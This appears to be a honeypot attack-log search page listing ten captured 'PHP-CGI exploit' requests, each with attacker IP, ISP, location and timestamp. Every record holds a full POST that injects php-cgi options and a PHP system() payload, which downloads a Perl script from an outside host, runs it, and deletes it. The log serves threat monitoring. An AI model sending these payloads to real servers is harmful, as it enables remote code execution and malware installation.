This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 55 results (6 pages)

PHP-CGI exploit

[Attack info]
Attacker: 78.47.95.213
Dest. port: 80
Time: 17/03/2017 22:54:05
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Bavaria, Erding (Klettham)
rDNS: static.213.95.47.78.clients.your-server.de
POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 188 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;wget http://46.101.210.240/n2;perl n2;perl n2.1;rm -rf n2*");

PHP-CGI exploit

[Attack info]
Attacker: 78.47.95.213
Dest. port: 80
Time: 17/03/2017 22:54:05
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Bavaria, Erding (Klettham)
rDNS: static.213.95.47.78.clients.your-server.de
POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 188 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;wget http://46.101.210.240/n2;perl n2;perl n2.1;rm -rf n2*");

PHP-CGI exploit

[Attack info]
Attacker: 78.47.95.213
Dest. port: 80
Time: 17/03/2017 22:54:05
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Bavaria, Erding (Klettham)
rDNS: static.213.95.47.78.clients.your-server.de
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 188 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;wget http://46.101.210.240/n2;perl n2;perl n2.1;rm -rf n2*");

PHP-CGI exploit

[Attack info]
Attacker: 78.47.95.213
Dest. port: 80
Time: 17/03/2017 22:54:05
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Bavaria, Erding (Klettham)
rDNS: static.213.95.47.78.clients.your-server.de
POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 188 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;wget http://46.101.210.240/n2;perl n2;perl n2.1;rm -rf n2*");

PHP-CGI exploit

[Attack info]
Attacker: 78.47.95.213
Dest. port: 80
Time: 17/03/2017 22:54:05
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Bavaria, Erding (Klettham)
rDNS: static.213.95.47.78.clients.your-server.de
POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 188 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;wget http://46.101.210.240/n2;perl n2;perl n2.1;rm -rf n2*");

PHP-CGI exploit

[Attack info]
Attacker: 80.80.234.140
Dest. port: 80
Time: 02/01/2017 02:27:22
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS21217 SAFEHOSTNET Colocation center in Geneva
Location: Geneva, Geneva (zipcode 1206)
rDNS: rebecca.salesconquest.com
POST /%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 Host: -c Content-Type: application/x-www-form-urlencoded Content-Length: 169 <? system("cd /tmp ; wget http://smsmoney.tv/e.txt ; curl -O http://smsmoney.tv/e.txt ; fetch http://smsmoney.tv/e.txt ; chmod +x e.txt ; perl e.txt ; rm -rf e.txt"); ?>

PHP-CGI exploit

[Attack info]
Attacker: 62.178.55.82
Dest. port: 80
Time: 08/11/2016 12:53:33
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS6830 Liberty Global Operations B.V.
Location: Vienna, Vienna (zipcode 1100)
POST /%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 Host: -h Content-Type: application/x-www-form-urlencoded Content-Length: 341 <? system("cd /var/tmp; wget ftp://test:[email protected]/play.jpg -O /var/tmp/play.jpg; curl -O ftp://test:[email protected]/play.jpg -O /var/tmp/play.jpg; fetch ftp://test:[email protected]/play.jpg -O /var/tmp/play.jpg; lwp-download ftp://test:[email protected]/play.jpg -O /var/tmp/play.jpg; perl /var/tmp/play.jpg;rm -rf *.jpg"); ?>

PHP-CGI exploit

[Attack info]
Attacker: 50.23.211.11
Dest. port: 80
Time: 05/11/2016 22:21:37
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS36351 SoftLayer Technologies Inc.
Location: Texas, Dallas (zipcode 75270)
rDNS: b.d3.1732.ip4.static.sl-reverse.com
POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 249 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;wget http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;lynx http://46.101.210.240/n2;perl n2 ; perl n2.1;perl /tmp/n2;rm -rf n2*;rm -rf /tmp/n2*");

PHP-CGI exploit

[Attack info]
Attacker: 50.23.211.11
Dest. port: 80
Time: 05/11/2016 22:21:36
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS36351 SoftLayer Technologies Inc.
Location: Texas, Dallas (zipcode 75270)
rDNS: b.d3.1732.ip4.static.sl-reverse.com
POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 249 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;wget http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;lynx http://46.101.210.240/n2;perl n2 ; perl n2.1;perl /tmp/n2;rm -rf n2*;rm -rf /tmp/n2*");

PHP-CGI exploit

[Attack info]
Attacker: 50.23.211.11
Dest. port: 80
Time: 05/11/2016 22:21:36
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS36351 SoftLayer Technologies Inc.
Location: Texas, Dallas (zipcode 75270)
rDNS: b.d3.1732.ip4.static.sl-reverse.com
POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 connection: close Host: 114.255.167.162 Content-Type: application/x-www-form-urlencoded Content-Length: 249 User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 <?php system("cd /tmp;lwp-download -a http://46.101.210.240/n2;wget http://46.101.210.240/n2;curl -O http://46.101.210.240/n2;fetch http://46.101.210.240/n2;lynx http://46.101.210.240/n2;perl n2 ; perl n2.1;perl /tmp/n2;rm -rf n2*;rm -rf /tmp/n2*");